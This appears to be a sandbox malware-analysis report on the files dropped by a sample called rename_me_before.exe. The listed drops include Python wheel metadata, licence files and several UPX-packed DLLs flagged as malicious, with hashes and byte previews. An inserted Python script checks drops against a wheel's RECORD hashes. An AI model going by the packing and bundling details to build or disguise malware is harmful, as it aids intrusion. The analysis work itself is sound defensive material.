                                                                                                                                                                                                                                                          Preview:attr/__init__.py,sha256=WlXJN6ICB0Y_HZ0lmuTUgia0kuSdn2p67d4N6cYxNZM,3307..attr/__init__.pyi,sha256=u08EujYHy_rSyebNn-I9Xv2S_cXmtA9xWGc0cBsyl18,16976..attr/__pycache__/__init__.cpython-311.pyc,,..attr/__pycache__/_cmp.cpython-311.pyc,,..attr/__pycache__/_compat.cpython-311.pyc,,..attr/__pycache__/_config.cpython-311.pyc,,..attr/__pycache__/_funcs.cpython-311.pyc,,..attr/__pycache__/_make.cpython-311.pyc,,..attr/__pycache__/_next_gen.cpython-311.pyc,,..attr/__pycache__/_version_info.cpython-311.pyc,,..attr/__pycache__/converters.cpython-311.pyc,,..attr/__pycache__/exceptions.cpython-311.pyc,,..attr/__pycache__/filters.cpython-311.pyc,,..attr/__pycache__/setters.cpython-311.pyc,,..attr/__pycache__/validators.cpython-311.pyc,,..attr/_cmp.py,sha256=OQZlWdFX74z18adGEUp40Ojqm0NNu1Flqnv2JE8B2ng,4025..attr/_cmp.pyi,sha256=sGQmOM0w3_K4-X8cTXR7g0Hqr290E8PTObA9JQxWQqc,399..attr/_compat.py,sha256=QmRyxii295wcQfaugWqxuIumAPsNQ2-RUF82QZPqMKw,2540..attr/_config.py,sha256=z81Vt-GeT_2taxs1XZfmHx9TWlSxjP
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):87
                                                                                                                                                                                                                                                          Entropy (8bit):4.699003560068366
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:RtEeXAaCTUhvhjP+tPCCfA5I:Rt2PYhvxWBB3
                                                                                                                                                                                                                                                          MD5:C58F7D318BAA542F6BFD220F837AB63F
                                                                                                                                                                                                                                                          SHA1:F655FC3C0EB1BF12629C5750B2892BD896C3E7D9
                                                                                                                                                                                                                                                          SHA-256:99161210BDC887A8396BF095308730885FFFD007B8FE02D8874D5814DC22AB59
                                                                                                                                                                                                                                                          SHA-512:3DA6980A39C368AB7F7527FCD5FCDAA9D321060174BAAE163BF73F8052A2AC1A73F476C3882855965DFC2CB13C7C3EC1A012882201389DAC887F9BE59540C80F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: hatchling 1.21.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1109
                                                                                                                                                                                                                                                          Entropy (8bit):5.104415762129373
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                                          MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                                                                                                                                                                          SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                                                                                                                                                                          SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                                                                                                                                                                          SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1440734
                                                                                                                                                                                                                                                          Entropy (8bit):5.590383253842785
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfb8h30iwhBdYf9PfeYHHc:mQR5pE/RbPu
                                                                                                                                                                                                                                                          MD5:D220B7E359810266FE6885A169448FA0
                                                                                                                                                                                                                                                          SHA1:556728B326318B992B0DEF059ECA239EB14BA198
                                                                                                                                                                                                                                                          SHA-256:CA40732F885379489D75A2DEC8EB68A7CCE024F7302DD86D63F075E2745A1E7D
                                                                                                                                                                                                                                                          SHA-512:8F802C2E717B0CB47C3EEEA990FFA0214F17D00C79CE65A0C0824A4F095BDE9A3D9D85EFB38F8F2535E703476CB6F379195565761A0B1D738D045D7BB2C0B542
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text
Category:dropped
Size (bytes):4
Entropy (8bit):1.5
Encrypted:false
SSDEEP:3:Mn:M
MD5:365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:false
Preview:pip.

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text
Category:dropped
Size (bytes):197
Entropy (8bit):4.61968998873571
Encrypted:false
SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:8C3617DB4FB6FAE01F1D253AB91511E4
SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:false
Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text
Category:dropped
Size (bytes):11360
Entropy (8bit):4.426756947907149
Encrypted:false
SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:4E168CCE331E5C827D4C2B68A6200E1B
SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:false
Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text
Category:dropped
Size (bytes):1532
Entropy (8bit):5.058591167088024
Encrypted:false
SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:false
Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5430
Entropy (8bit):5.111666659056883
Encrypted:false
SSDEEP:96:Dx2pqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:4JnkoBs/stL18cT+vIrrxsM6VwDjyeyM
MD5:07E3EEA441A0E6F99247D353BD664EA1
SHA1:99C8F9C2DD2D02BE18D50551ED4488325906C769
SHA-256:04FE672BF2AA70FF8E6B959DEFE7D676DCDFD34EE9062030BA352A40DB5E2D37
SHA-512:24F458C831F7A459D12E0217F4BD57F82A034FEC9EA154CAC303200E241A52838A1962612C5AAFF5CD837F668FDC810606624DCA901F4274973F84A9ADBA8D66
Malicious:false
Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.8..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:CSV text
Category:dropped
Size (bytes):15325
Entropy (8bit):5.563458272393817
Encrypted:false
SSDEEP:384:eUXz6cZmsyP6gbCP+onvZ6FGotqw++9wvnd:eUj6cZmsyP6g4N
MD5:D642B5D5BB864006D0457F1CB8E41197
SHA1:81F98E289CF8320701353BFBBA8255C6460EDD3B
SHA-256:3909DBBE41F046B701CC362332C28020C25A20963E3B8587D1C453402C106859
SHA-512:0397C2C71045E0F9FCE25FD5A350A3F4FA3A230937ECD659D9955D1FD75D1D5A21370A88D9A7F9F44111E4D3DF7578C2EF7A16B43B542AEDF7B65DBD484886DD
Malicious:false
Preview:cryptography-42.0.8.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.8.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.8.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.8.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.8.dist-info/METADATA,sha256=BP5nK_KqcP-Oa5Wd7-fWdtzf007pBiAwujUqQNteLTc,5430..cryptography-42.0.8.dist-info/RECORD,,..cryptography-42.0.8.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-42.0.8.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.8.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=ugkzP6GZzVCOhwUvdLskgcf4kS7b7o-gvba32agVp94,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_
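The dropped files in this run of the report are the dist-info metadata of the cryptography 42.0.8 wheel (name and version from the METADATA and RECORD previews), and the report marks each of them Malicious:false. The RECORD file is the wheel's own manifest: one CSV row per shipped file with its SHA-256 in urlsafe base64 without padding and its size in bytes (the PEP 376 / PEP 427 encoding). That lets an analyst do two useful things with the hash and size the sandbox prints for each nameless drop: identify which wheel file a drop is, and confirm the sample did not modify bundled library files to smuggle its own code. The script below is an added example, not part of the Joe Sandbox report or of the cryptography project; the RECORD lines are copied from the preview above (truncated there, so only the dist-info rows are used), and the INSTALLER content b"pip\n" is an assumption taken from its 4-byte size and the "pip." preview, in which the sandbox renders the newline as a dot.

```python
import base64
import csv
import hashlib
import io

# Copied from the RECORD preview in the report above; a full RECORD lists every
# file in the wheel, the preview is cut off after the dist-info rows.
RECORD_SNIPPET = """\
cryptography-42.0.8.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4
cryptography-42.0.8.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197
cryptography-42.0.8.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360
cryptography-42.0.8.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532
cryptography-42.0.8.dist-info/METADATA,sha256=BP5nK_KqcP-Oa5Wd7-fWdtzf007pBiAwujUqQNteLTc,5430
cryptography-42.0.8.dist-info/RECORD,,
cryptography-42.0.8.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0
cryptography-42.0.8.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100
cryptography-42.0.8.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13
"""

# Constructed sample of recovered drops. INSTALLER = b"pip\n" is an assumption
# from the report's 4-byte size and "pip." preview; REQUESTED is a 0-byte file.
DROPPED_FILES = {
    "cryptography-42.0.8.dist-info/INSTALLER": b"pip\n",
    "cryptography-42.0.8.dist-info/REQUESTED": b"",
}


def urlsafe_sha256(data: bytes) -> str:
    """SHA-256 in RECORD encoding: urlsafe base64 with the '=' padding stripped."""
    digest = hashlib.sha256(data).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def hex_to_record_hash(hex_digest: str) -> str:
    """Re-encode the hex SHA-256 a sandbox report prints into RECORD encoding."""
    return base64.urlsafe_b64encode(bytes.fromhex(hex_digest)).rstrip(b"=").decode("ascii")


def parse_record(text: str) -> dict:
    """Map path -> (record_hash or None, size or None). RECORD lists itself with both blank."""
    entries = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 3:
            continue  # skip blank or malformed rows instead of crashing on a hostile RECORD
        path, hash_field, size_field = row
        record_hash = None
        if hash_field:
            algo, _, value = hash_field.partition("=")
            if algo != "sha256":
                raise ValueError("%s: unsupported hash algorithm %r" % (path, algo))
            record_hash = value
        size = int(size_field) if size_field else None
        entries[path] = (record_hash, size)
    return entries


def identify_by_hash(record: dict, hex_digest: str, size: int):
    """Name the wheel file a drop is, given only the hex SHA-256 and byte size from a report.
    Returns the RECORD path, or None when no row matches both hash and size."""
    wanted = hex_to_record_hash(hex_digest)
    for path, (record_hash, record_size) in record.items():
        if record_hash == wanted and record_size == size:
            return path
    return None


def verify_dropped(record: dict, dropped: dict) -> dict:
    """Check recovered file bytes against RECORD; returns path -> status string."""
    results = {}
    for path, content in dropped.items():
        if path not in record:
            results[path] = "not-in-record"   # the wheel never shipped this: inspect it
            continue
        record_hash, record_size = record[path]
        if record_hash is None:
            results[path] = "unhashed"        # only RECORD itself is legitimately unhashed
        elif record_size is not None and record_size != len(content):
            results[path] = "size-mismatch"
        elif urlsafe_sha256(content) != record_hash:
            results[path] = "hash-mismatch"
        else:
            results[path] = "ok"
    return results


if __name__ == "__main__":
    rec = parse_record(RECORD_SNIPPET)
    # The 4-byte drop whose SHA-256 the report prints as CEEBAE7B... is INSTALLER.
    print(identify_by_hash(rec, "CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508", 4))
    print(verify_dropped(rec, DROPPED_FILES))
    tampered = dict(DROPPED_FILES)
    tampered["cryptography-42.0.8.dist-info/INSTALLER"] = b"pip\n# appended"
    print(verify_dropped(rec, tampered))
```

Matching on both hash and size avoids confusing files that collide on one field only, and a size check before hashing is cheap triage when hundreds of drops must be mapped. A drop that is not in RECORD at all, or whose bytes no longer match, is where a bundled library has been used to hide sample code and deserves a closer look than the Malicious:false verdict suggests.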

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text
Category:dropped
Size (bytes):100
Entropy (8bit):5.0203365408149025
Encrypted:false
SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
MD5:C48772FF6F9F408D7160FE9537E150E0
SHA1:79D4978B413F7051C3721164812885381DE2FDF5
SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
Malicious:false
Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text
Category:dropped
Size (bytes):13
Entropy (8bit):3.2389012566026314
Encrypted:false
SSDEEP:3:cOv:Nv
MD5:E7274BD06FF93210298E7117D11EA631
SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
Malicious:false
                                                                                                                                                                                                                                                          Preview:cryptography.
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2102272
                                                                                                                                                                                                                                                          Entropy (8bit):7.999630264030653
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:49152:Zxb/ugbzxYwKmcNaEufwWGvEJx4nC1M+MvyaR:ZZ5LsNNWdQn8ZZ0
                                                                                                                                                                                                                                                          MD5:B77C7DE3D1F9BF06ECAD3A1F8417F435
                                                                                                                                                                                                                                                          SHA1:AB60A744F8614EA68FD522CE6AEB125F9FC2F2D8
                                                                                                                                                                                                                                                          SHA-256:A59A933DEF9329CCBCAC18135EC2976599A42EBD8FFDAEED650DC185B47B11FB
                                                                                                                                                                                                                                                          SHA-512:1AFAF8C42D41D03E47A671325215452FCB8B4EA6576ACAC056AE18297829FB1F67C24F367AD20D825B0C5CB6D7997529D796BD947FF03B89154E7C5686335879
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..m...m...m...d.@.....2..o...2..|...2..e...2..i....2..o...m...L......|...1......m.......1..l...1..l...Richm...........................PE..d....o_f.........." ...'.. ...... O..)o..0O..................................Po...........`.........................................(Eo.p....@o.(............`j.DO...........Eo.$............................5o.(....6o.@...........................................UPX0..... O.............................UPX1...... ..0O... .................@...UPX2.........@o....... .............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36352
                                                                                                                                                                                                                                                          Entropy (8bit):7.843168848110761
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:5S6WTnXeaMytX+TkQ5l1b2YyvPBsDNFyMCipcL:5S6WDuaM6XuvZyuaMEL
                                                                                                                                                                                                                                                          MD5:15B0DF96344BAF6A4C72766721943E52
                                                                                                                                                                                                                                                          SHA1:A3666E88594D1EC97DE23B9242F346C43A34C070
                                                                                                                                                                                                                                                          SHA-256:ABB6F497003738DB2407B01DFA0ABC61F6BC7FDB2452C52F76AB11F5430D844F
                                                                                                                                                                                                                                                          SHA-512:4FBF295D0882646B8C4B3284F11331FB12767FD1404D78D3E4D88A434896058C2DF05DD1A2D9C8CE696D2D3AAD8C7251D00D95C399DF2E8C11BB319F87A4385E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!\5.@2f.@2f.@2f.8.f.@2f.?3g.@2f.83g.@2f.?7g.@2f.?6g.@2f.?1g.@2fK=3g.@2f.@3f.@2f..:g.@2f..2g.@2f...f.@2f..0g.@2fRich.@2f................PE..d.....{e.........." ...%.........0.......@................................................`.............................................h....................p..(.......................................................@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1629464
                                                                                                                                                                                                                                                          Entropy (8bit):7.952620301087112
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:kMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:owbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                                                                                          MD5:F3FDBBD6C6EA0ABE779151AE92C25321
                                                                                                                                                                                                                                                          SHA1:0E62E32666BA5F041B5369B36470295A1916CB4E
                                                                                                                                                                                                                                                          SHA-256:9000E335744818665B87A16A71DA5B622B5052B5341F1D6CE08FF8346D2BF3E4
                                                                                                                                                                                                                                                          SHA-512:E8A363042A05868ACC693B5D313F52FFC95B8F6B764A77FF477B0CE2288787DD275478DDBE33D6DBD87636BA9FF0243D2E447A161E2F9CC2F3DBA0746F219E4E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):29968
                                                                                                                                                                                                                                                          Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Tp/6aepjG56w24Up3p45YiSyvkIPxWEqG:5A154spK7SytPxF
                                                                                                                                                                                                                                                          MD5:0D1C6B92D091CEF3142E32AC4E0CC12E
                                                                                                                                                                                                                                                          SHA1:440DAD5AF38035CB0984A973E1F266DEFF2BD7FC
                                                                                                                                                                                                                                                          SHA-256:11EE9C7FB70C3756C0392843245935517171B95CC5BA0D696B2C1742C8D46FB6
                                                                                                                                                                                                                                                          SHA-512:5D514ECAB93941E83C008F0E9749F99E330949580884BF4850B11CAC08FE1AC4AC50033E8888045FE4A9D8B4D2E3EA667B39BE18F77266D00F8D7D6797260233
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):229144
                                                                                                                                                                                                                                                          Entropy (8bit):7.930038440560372
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:GFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:GFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                                                                                          MD5:F9BC28708C1628EF647A17D77C4F5F1A
                                                                                                                                                                                                                                                          SHA1:032A8576487AD26F04D31628F833EF9534942DA6
                                                                                                                                                                                                                                                          SHA-256:49BA508DC66C46B9E904BB5FE50CF924465EFF803A9F1E4260E752B0231EFCC1
                                                                                                                                                                                                                                                          SHA-512:E33FD00BCF73AAB8BCE260EDA995A1513930B832EA881C5A8CE1A151BE3576F3369AC0B794FDD93806157BB9F4FE4EBA38A25F4FDC512A6F3640647B8B447387
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
